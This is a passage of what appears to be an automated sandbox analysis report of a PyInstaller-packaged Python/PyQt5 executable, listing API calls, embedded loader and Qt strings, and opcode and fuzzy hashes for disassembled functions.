                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7124F45F4,00000000,00007FF7124F1985), ref: 00007FF7124F93C9
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00007FF7124F6476,?,00007FF7124F336E), ref: 00007FF7124F8EA2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2592636585-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF712500C90,?,?,?,00007FF7125022FA,?,?,?,?,?,00007FF712503AE9), ref: 00007FF71250D63A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                          • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                          • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$A@$$V0@@$?loadDocument@@Resource@TextUrl@@@
                                                                                                                                                                                                                                          • String ID: BiJ9$QTextDocument$loadResource$loadResource(self, type: int, name: QUrl) -> Any
                                                                                                                                                                                                                                          • API String ID: 670874972-1845412488
                                                                                                                                                                                                                                          • Opcode ID: 20c4205221668f101a6e2e80cf5dcd6513339ad9275bfb161c5680ce1f671623
                                                                                                                                                                                                                                          • Instruction ID: 9683f4fc76ed08aa0fe94b53ef6f32e283f2ee753ad3e52d5a5e24f3e5bef1e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20c4205221668f101a6e2e80cf5dcd6513339ad9275bfb161c5680ce1f671623
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48410D37608A8686DA608B11E4447AAA3A4FB85FD4F444032DACE43769EF3CE059CB04
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mem_SubtypeType_$DataFreeFromKindMallocUnicode_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3500989990-0
                                                                                                                                                                                                                                          • Opcode ID: 76cdbbed4ec85edb5246489e997a29ce274d103f94b2efc47d71435fe755d074
                                                                                                                                                                                                                                          • Instruction ID: 6f2f38ea689f420b55a4382cc396db467cc8e22d78d3ae79097dc72e3d6159af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76cdbbed4ec85edb5246489e997a29ce274d103f94b2efc47d71435fe755d074
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B902E3B2A2865282E7748B18D4946BD3EA1EB85FC8F544131EACE477D5DF2CF844C720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F842B
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84AE
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84CD
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84DB
                                                                                                                                                                                                                                          • FindClose.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84EC
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84F5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                          • String ID: %s\*
                                                                                                                                                                                                                                          • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                          • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                          • Instruction ID: 2fa65c9a665bdd242f8f1fa2d4fee73d271b5ebdbec547f78dad87419e254311
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5413D21A0CD5295FB20AF28E4941BAB360FBD4764FC00232ED9D46698EFACD95DC720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mem_$MallocSubtypeType_$DeallocErr_FreeMemory
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4139299733-0
                                                                                                                                                                                                                                          • Opcode ID: f3b34b9a491a7328e3479242aa4f01da2548d41b57f80c50a6892646becf0bf0
                                                                                                                                                                                                                                          • Instruction ID: d89a9df4716c59487fe973b417ef7574eeacdd0e641206acb8cc82f3ec6105e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3b34b9a491a7328e3479242aa4f01da2548d41b57f80c50a6892646becf0bf0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5F1D0B2A2C5A281EB74CF19A0946BD3FA5EB55FC8F541135DA8E866D1DE2CF841C320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                                          • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                          • Instruction ID: 6186b7209e92ae963fc60d930f2b6915e0db903a7c216c6a85be89b92cda1950
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A310E76608F8186EB649F64E8803ED6364FB88754F444039DA5E47B94EFB8D55CC710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515C45
                                                                                                                                                                                                                                            • Part of subcall function 00007FF712515598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7125155AC
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: HeapFree.KERNEL32(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A95E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: GetLastError.KERNEL32(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A968
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF71250A8DF,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250A909
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF71250A8DF,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250A92E
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515C34
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7125155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71251560C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515EAA
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515EBB
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515ECC
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF71251610C), ref: 00007FF712515EF3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4070488512-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_$Data@@List$?dispose@ClearData@1@@$Iter_Next$?detach_grow@Data@1@FlagsFormatIterObject_OccurredType_
                                                                                                                                                                                                                                          • String ID: index %zd has type '%s' but 'QSize' is expected
                                                                                                                                                                                                                                          • API String ID: 898475402-3766856804
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_$Point@@@@Vector@$Clear$??1?$Iter_Next$??0?$?append@?$FlagsFormatIterObject_OccurredPoint@@@Type_
                                                                                                                                                                                                                                          • String ID: index %zd has type '%s' but 'QPoint' is expected
                                                                                                                                                                                                                                          • API String ID: 3758343881-1323054559
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?drawPolygon@QPainter@@QEAAXAEBVQPolygonF@@W4FillRule@Qt@@@Z.QT5GUI ref: 00007FF89D9A20EA
                                                                                                                                                                                                                                          • ?drawPolygon@QPainter@@QEAAXAEBVQPolygon@@W4FillRule@Qt@@@Z.QT5GUI ref: 00007FF89D9A2189
                                                                                                                                                                                                                                          • ?drawPolygon@QPainter@@QEAAXPEBVQPointF@@HW4FillRule@Qt@@@Z.QT5GUI ref: 00007FF89D9A2237
                                                                                                                                                                                                                                          • PyTuple_Size.PYTHON3 ref: 00007FF89D9A22EF
                                                                                                                                                                                                                                          • ?drawPolygon@QPainter@@QEAAXPEBVQPointF@@HW4FillRule@Qt@@@Z.QT5GUI ref: 00007FF89D9A2303
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON3 ref: 00007FF89D9A2322
                                                                                                                                                                                                                                          • ?drawPolygon@QPainter@@QEAAXPEBVQPoint@@HW4FillRule@Qt@@@Z.QT5GUI ref: 00007FF89D9A23ED
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89D9C2F60: PyTuple_Size.PYTHON3(?,?,?,?,?,00007FF89D99C1F7), ref: 00007FF89D9C2F82
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89D9C2F60: ??0QPoint@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF89D99C1F7), ref: 00007FF89D9C2FB5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89D9C2F60: PyTuple_Size.PYTHON3(?,?,?,?,?,00007FF89D99C1F7), ref: 00007FF89D9C2FD4
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89D9C2F60: PyTuple_GetItem.PYTHON3(?,?,?,?,?,00007FF89D99C1F7), ref: 00007FF89D9C2FF5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89D9C2F60: PyTuple_Size.PYTHON3(?,?,?,?,?,00007FF89D99C1F7), ref: 00007FF89D9C3050
                                                                                                                                                                                                                                          • PyTuple_Size.PYTHON3 ref: 00007FF89D9A2483
                                                                                                                                                                                                                                          • ?drawPolygon@QPainter@@QEAAXPEBVQPoint@@HW4FillRule@Qt@@@Z.QT5GUI ref: 00007FF89D9A2497
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON3 ref: 00007FF89D9A24B6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?drawFillPainter@@Polygon@Qt@@@Rule@Tuple_$Size$Point@@$DeallocPoint$ItemPolygonPolygon@@
                                                                                                                                                                                                                                          • String ID: B>|E$BJ0W$BJ8W$BJ9|E$QPainter$drawPolygon$drawPolygon(self, points: QPolygonF, fillRule: Qt.FillRule = Qt.OddEvenFill)drawPolygon(self, points: QPolygon, fillRule: Qt.FillRule = Qt.OddEvenFill)drawPolygon(self, points: Optional[PyQt5.sip.array[Union[QPointF, QPoint]]], fillRule: Qt.FillRule = Qt.Odd
                                                                                                                                                                                                                                          • API String ID: 2830521402-1740170162
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • index %zd has type '%s' but 'QAbstractTextDocumentLayout::Selection' is expected, xrefs: 00007FF89D947EEA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_$Clear$Iter_Next$?sharedArrayData@@FlagsFormatIterNull@Object_OccurredType_
                                                                                                                                                                                                                                          • String ID: index %zd has type '%s' but 'QAbstractTextDocumentLayout::Selection' is expected
                                                                                                                                                                                                                                          • API String ID: 2049041316-1958747605
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?drawPainter@@Points@Tuple_$Size$Point@@$DeallocPoint$F@@@ItemPolygonPolygon@@@
                                                                                                                                                                                                                                          • String ID: BJ0W$BJ8W$BJ9$QPainter$drawPoints$drawPoints(self, points: QPolygonF)drawPoints(self, points: QPolygon)drawPoints(self, points: Optional[PyQt5.sip.array[Union[QPointF, QPoint]]])drawPoints(self, point: Optional[Union[QPointF, QPoint]], *args: Union[QPointF, QPoint])drawPoints(self, points:
                                                                                                                                                                                                                                          • API String ID: 2352560762-2263801330
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_Thread$?load@Bool_DeallocFromLongPicture@@RestoreSave$Device@@String@@
                                                                                                                                                                                                                                          • String ID: BJ1|AA$BJ8|AA$QPicture$load$load(self, dev: Optional[QIODevice], format: Optional[str] = None) -> boolload(self, fileName: Optional[str], format: Optional[str] = None) -> bool
                                                                                                                                                                                                                                          • API String ID: 2031798773-2951445728
                                                                                                                                                                                                                                          • Opcode ID: 63fe89bb60495de7705d6b3ee5c53262279b7ffc0e7db643a7427ff10008a9fe
                                                                                                                                                                                                                                          • Instruction ID: ec47273cca4dcc36e5843a184bae796fed838cf8cacb304c1205e0c771a71486
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63fe89bb60495de7705d6b3ee5c53262279b7ffc0e7db643a7427ff10008a9fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C951BC3760AF41D9DB609F25E8851A973E8FB48BD4F410136EA8E43B68EF38E565C304
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • element %zd has type '%s' but 'QFontDatabase.WritingSystem' is expected, xrefs: 00007FF89D976210
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Sequence_$?detach_grow@CheckData@1@Data@@Err_FlagsItemListOccurredSizeType_
                                                                                                                                                                                                                                          • String ID: element %zd has type '%s' but 'QFontDatabase.WritingSystem' is expected
                                                                                                                                                                                                                                          • API String ID: 3772155008-1695380754
                                                                                                                                                                                                                                          • Opcode ID: 1148263e027fde29fbc7795b4cbce87eadaa7c1c7006bc26e05b6af7d4fc637e
                                                                                                                                                                                                                                          • Instruction ID: 10688e3ab9973c36f034fd8c1532a380400189959dd0e5cfa3133208fe77bf98
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1148263e027fde29fbc7795b4cbce87eadaa7c1c7006bc26e05b6af7d4fc637e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CA16A33A08A4286EBA09F15E44936D77A1FB89FD4F848135DA8E8B754EF3CE456C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CompareStringUnicode_With$MallocMem_SubtypeType_
                                                                                                                                                                                                                                          • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                                                                                                                                                                                                          • API String ID: 2156454041-3528878251
                                                                                                                                                                                                                                          • Opcode ID: da3b54f35a8fb496e7d97c3fec9d3f2a0cbd8ed79af4ca103da2bfe7283e7162
                                                                                                                                                                                                                                          • Instruction ID: bb9705ee41797de125db4941f6c8588758ba22ceb59f1edf5c240e43b1bb7dfd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da3b54f35a8fb496e7d97c3fec9d3f2a0cbd8ed79af4ca103da2bfe7283e7162
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E05151A1A3C65342FB748B6595D467A6F92AF42FC8F045531EACE87B81DE2CF501C720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Array@@BytePoint@@@@Vector@$??0?$?begin@?$?receivers@FromLongLong_Object@@Point@@
                                                                                                                                                                                                                                          • String ID: BP0$QTextFrame$pyqt5_get_signal_signature$receivers$receivers(self, signal: PYQT_SIGNAL) -> int
                                                                                                                                                                                                                                          • API String ID: 842024227-1020384895
                                                                                                                                                                                                                                          • Opcode ID: 5aad8c7ca268afb6cb2a5fb358e8c423fe8b1d7609f29877a1444a56bebf5628
                                                                                                                                                                                                                                          • Instruction ID: 263d511ac36eaab3eff94b079ef59c3925935d70e4ef082946749d71ceaf090c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aad8c7ca268afb6cb2a5fb358e8c423fe8b1d7609f29877a1444a56bebf5628
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F31FB73A09A4692EB209F25E8491AA33E5FB44F95B914132DA8E43364FF3CF959C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Array@@BytePoint@@@@Vector@$??0?$?begin@?$?receivers@FromLongLong_Object@@Point@@
                                                                                                                                                                                                                                          • String ID: BP0$QIntValidator$pyqt5_get_signal_signature$receivers$receivers(self, signal: PYQT_SIGNAL) -> int
                                                                                                                                                                                                                                          • API String ID: 842024227-771453059
                                                                                                                                                                                                                                          • Opcode ID: 4db83b436f92d119fbc921852f0b2cb41d862c6f5ce2dd156cbf42960498a7ca
                                                                                                                                                                                                                                          • Instruction ID: 889b04d02ad126e814c98c06a07f7364691db83762a4705318c6682d8bcf56aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4db83b436f92d119fbc921852f0b2cb41d862c6f5ce2dd156cbf42960498a7ca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC31FC37A08A06C2EB209B25E8895B973E5FB44F95B914132DA8E42370FF3CF959C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                          • String ID: P%
                                                                                                                                                                                                                                          • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                          • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction ID: fac39cf6d3b0a346d1e0cf02b35199e6441f402d3e6771e2ac713e2d202d3416
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9551F726604BA186D6349F26F4581BAF7A1F798B61F004121EFDE43694EF7CD049DB20
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7124F45F4,00000000,00007FF7124F1985), ref: 00007FF7124F93C9
                                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7124F86B7,?,?,00000000,00007FF7124F3CBB), ref: 00007FF7124F822C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2810: MessageBoxW.USER32 ref: 00007FF7124F28EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                          • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                          • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                          • Opcode ID: afd584be0f0c6cf4fdafb40c90c8fbd83afcdccf603674318d77e8228e9b29d1
                                                                                                                                                                                                                                          • Instruction ID: 147ced118033e16c8bd0d7b7920fa7b5c8e5ab750457864cd3172190355da8aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afd584be0f0c6cf4fdafb40c90c8fbd83afcdccf603674318d77e8228e9b29d1
